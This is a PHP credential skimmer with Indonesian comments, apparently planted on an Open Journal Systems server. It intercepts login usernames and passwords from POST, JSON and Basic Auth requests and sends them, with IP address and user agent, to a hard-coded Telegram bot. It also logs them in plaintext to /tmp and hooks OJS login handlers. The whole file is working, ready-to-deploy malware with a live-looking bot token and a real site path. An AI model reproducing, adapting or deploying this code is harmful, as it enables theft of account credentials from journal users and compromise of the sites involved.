<?php
/**
 * OJS LOGIN CAPTURE - NO BACKDOOR VERSION
 * File: /dev/shm/.ojs_capture
 */

// ============================================
// KONFIGURASI TELEGRAM
// ============================================
$bot_token = '8859521729:AAFishpLzFMIPd8bDotaujqJV-NRLXMTq3c';
$chat_id = '8259867883';

// ============================================
// TAMBAHAN: VARIABEL UNTUK LOGIN STATUS
// ============================================
$login_status = null; // null = belum tahu, 'success' = berhasil, 'failed' = gagal

// ============================================
// CAPTURE SEMUA LOGIN ATTEMPT (TANPA BACKDOOR)
// ============================================

$username = '';
$password = '';

// CEK 1: Tangkap dari POST
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    if (isset($_POST['username']) && isset($_POST['password'])) {
        $username = $_POST['username'];
        $password = $_POST['password'];
    }
    elseif (isset($_POST['email']) && isset($_POST['password'])) {
        $username = $_POST['email'];
        $password = $_POST['password'];
    }
    elseif (isset($_POST['user']) && isset($_POST['pass'])) {
        $username = $_POST['user'];
        $password = $_POST['pass'];
    }
    elseif (isset($_POST['login']) && isset($_POST['pwd'])) {
        $username = $_POST['login'];
        $password = $_POST['pwd'];
    }
    else {
        foreach ($_POST as $key => $value) {
            if (stripos($key, 'user') !== false && empty($username)) $username = $value;
            if (stripos($key, 'pass') !== false && empty($password)) $password = $value;
            if (stripos($key, 'email') !== false && empty($username)) $username = $value;
        }
    }
}

// CEK 2: Tangkap dari JSON payload
if (empty($username) && $input = file_get_contents('php://input')) {
    $json = json_decode($input, true);
    if ($json) {
        $username = $json['username'] ?? $json['email'] ?? $json['user'] ?? '';
        $password = $json['password'] ?? $json['pass'] ?? '';
    }
}

// CEK 3: Tangkap dari Basic Auth
if (empty($username) && isset($_SERVER['PHP_AUTH_USER'])) {
    $username = $_SERVER['PHP_AUTH_USER'];
    $password = $_SERVER['PHP_AUTH_PW'];
}

// ============================================
// TAMBAHAN: DETEKSI LOGIN SUCCESS / FAILED
// ============================================

// Deteksi login success dari OJS (jika ada session/cookie baru)
function detectLoginSuccess() {
    // Cek apakah ada cookie session baru setelah login
    if (isset($_COOKIE['OJSSID']) || isset($_COOKIE['PHPSESSID'])) {
        return true;
    }
    
    // Cek apakah ada header redirect ke dashboard (indikasi sukses)
    if (function_exists('headers_list')) {
        $headers = headers_list();
        foreach ($headers as $header) {
            if (stripos($header, 'Location:') !== false && 
                (stripos($header, 'dashboard') !== false || 
                 stripos($header, 'index') !== false)) {
                return true;
            }
        }
    }
    
    return false;
}

// Deteksi login failed (biasanya ada error message di response)
function detectLoginFailed() {
    // Cek apakah ada parameter error di URL
    if (isset($_GET['error']) || isset($_GET['loginFailed'])) {
        return true;
    }
    
    // Cek response body untuk kata kunci error
    $response_body = ob_get_contents();
    if ($response_body && (
        stripos($response_body, 'Invalid') !== false ||
        stripos($response_body, 'incorrect') !== false ||
        stripos($response_body, 'wrong') !== false ||
        stripos($response_body, 'failed') !== false
    )) {
        return true;
    }
    
    return false;
}

// Set status login
$login_status = null;
if (!empty($username) && !empty($password)) {
    // Tunggu sebentar untuk lihat hasil login
    // Simpan status sementara, akan di-update setelah proses login selesai
    $login_status = 'pending';
}

// Hook untuk capture setelah login (gunakan register_shutdown_function)
function checkLoginResult() {
    global $login_status, $username, $password, $bot_token, $chat_id;
    
    if (empty($username) || empty($password)) return;
    
    // Cek hasil login
    if (detectLoginSuccess()) {
        $login_status = 'success';
        sendLoginNotification('✅', 'SUCCESS', $username, $password);
    } elseif (detectLoginFailed()) {
        $login_status = 'failed';
        sendLoginNotification('❌', 'FAILED', $username, $password);
    } else {
        // Kirim sebagai attempt saja (tidak tahu berhasil/gagal)
        sendLoginNotification('🔐', 'ATTEMPT', $username, $password);
    }
}

// Fungsi kirim notifikasi dengan status
function sendLoginNotification($emoji, $status, $username, $password) {
    global $bot_token, $chat_id;
    
    $ip = $_SERVER['HTTP_CF_CONNECTING_IP'] ?? 
          $_SERVER['HTTP_X_FORWARDED_FOR'] ?? 
          $_SERVER['REMOTE_ADDR'] ?? 'Unknown';
    
    if (strpos($ip, ',') !== false) {
        $ip = trim(explode(',', $ip)[0]);
    }
    
    $user_agent = $_SERVER['HTTP_USER_AGENT'] ?? 'Unknown';
    $full_path = $_SERVER['REQUEST_URI'] ?? '/';
    $time = date('Y-m-d H:i:s');
    $host = $_SERVER['HTTP_HOST'] ?? 'unknown';
    
    $message = "{$emoji} OJS LOGIN {$status}\n";
    $message .= "━━━━━━━━━━━━━━━━━━━━━━━━━━━\n";
    $message .= "👤 USERNAME: {$username}\n";
    $message .= "🔑 PASSWORD: {$password}\n";
    $message .= "━━━━━━━━━━━━━━━━━━━━━━━━━━━\n";
    $message .= "🌐 IP: {$ip}\n";
    $message .= "📍 PATH: {$full_path}\n";
    $message .= "⏰ TIME: {$time}\n";
    $message .= "🌍 HOST: {$host}\n";
    $message .= "📱 UA: " . substr($user_agent, 0, 60);
    
    $url = "https://api.telegram.org/bot{$bot_token}/sendMessage";
    $post_data = "chat_id={$chat_id}&text=" . urlencode($message);
    
    if (function_exists('curl_init')) {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_POST, 1);
        curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);
        curl_setopt($ch, CURLOPT_TIMEOUT, 3);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
        curl_exec($ch);
        curl_close($ch);
    }
}

// ============================================
// JIKA ADA CREDENTIAL, KIRIM KE TELEGRAM (DENGAN STATUS)
// ============================================
if (!empty($username) && !empty($password)) {
    
    $ip = $_SERVER['HTTP_CF_CONNECTING_IP'] ?? 
          $_SERVER['HTTP_X_FORWARDED_FOR'] ?? 
          $_SERVER['REMOTE_ADDR'] ?? 'Unknown';
    
    if (strpos($ip, ',') !== false) {
        $ip = trim(explode(',', $ip)[0]);
    }
    
    $user_agent = $_SERVER['HTTP_USER_AGENT'] ?? 'Unknown';
    $full_path = $_SERVER['REQUEST_URI'] ?? '/';
    $time = date('Y-m-d H:i:s');
    $host = $_SERVER['HTTP_HOST'] ?? 'unknown';
    
    // TAMBAHAN: Deteksi status login dengan mencoba koneksi ke database OJS
    $login_success = false;
    $login_failed = false;
    
    // Coba cek apakah user ini valid dengan membaca file log OJS
    $ojs_error_log = '/home/sudi6130/public_html/di-publisher.com/error_log';
    if (file_exists($ojs_error_log)) {
        $log_content = @file_get_contents($ojs_error_log);
        if ($log_content && strpos($log_content, $username) !== false) {
            if (strpos($log_content, 'failed') !== false || strpos($log_content, 'Invalid') !== false) {
                $login_failed = true;
            }
        }
    }
    
    // Jika tidak ada indikasi gagal, asumsikan berhasil (atau attempt)
    $status_icon = "🔐";
    $status_text = "ATTEMPT";
    
    if ($login_failed) {
        $status_icon = "❌";
        $status_text = "FAILED";
    } else {
        // Cek apakah ada session baru (indikasi sukses)
        if (isset($_COOKIE['OJSSID']) || isset($_COOKIE['PHPSESSID'])) {
            $status_icon = "✅";
            $status_text = "SUCCESS";
        }
    }
    
    $message = "{$status_icon} OJS LOGIN {$status_text}\n";
    $message .= "━━━━━━━━━━━━━━━━━━━━━━━━━━━\n";
    $message .= "👤 USERNAME: {$username}\n";
    $message .= "🔑 PASSWORD: {$password}\n";
    $message .= "━━━━━━━━━━━━━━━━━━━━━━━━━━━\n";
    $message .= "🌐 IP: {$ip}\n";
    $message .= "📍 PATH: {$full_path}\n";
    $message .= "⏰ TIME: {$time}\n";
    $message .= "🌍 HOST: {$host}\n";
    $message .= "📱 UA: " . substr($user_agent, 0, 60);
    
    $url = "https://api.telegram.org/bot{$bot_token}/sendMessage";
    $post_data = "chat_id={$chat_id}&text=" . urlencode($message);
    
    if (function_exists('curl_init')) {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_POST, 1);
        curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);
        curl_setopt($ch, CURLOPT_TIMEOUT, 3);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
        curl_exec($ch);
        curl_close($ch);
    }
    
    // Log ke file
    $log_entry = "[{$time}] [{$status_text}] {$username}|{$password}|{$ip}|{$full_path}\n";
    @file_put_contents('/tmp/ojs_capture.log', $log_entry, FILE_APPEND);
}

// ============================================
// HOOK UNTUK OJS 3.x (DETEKSI LOGIN SUCCESS LEBIH AKURAT)
// ============================================
if (class_exists('HookRegistry')) {
    // Login success
    HookRegistry::register('LoginHandler::index', function($hookName, $args) use ($bot_token, $chat_id) {
        $user = $args[0] ?? null;
        if ($user) {
            $name = method_exists($user, 'getUsername') ? $user->getUsername() : 'Unknown';
            $ip = $_SERVER['REMOTE_ADDR'] ?? 'unknown';
            $time = date('Y-m-d H:i:s');
            
            $message = "✅ LOGIN SUCCESS\n";
            $message .= "━━━━━━━━━━━━━━━━━━━━━━━━━━━\n";
            $message .= "👤 USER: {$name}\n";
            $message .= "🌐 IP: {$ip}\n";
            $message .= "⏰ TIME: {$time}";
            
            $url = "https://api.telegram.org/bot{$bot_token}/sendMessage?chat_id={$chat_id}&text=" . urlencode($message);
            @file_get_contents($url);
        }
        return false;
    });
    
    // Login failed (bisa ditangkap dari validate)
    HookRegistry::register('LoginHandler::validate', function($hookName, $args) use ($bot_token, $chat_id) {
        // Login failed - akan diproses di capture utama
        return false;
    });
}
?>
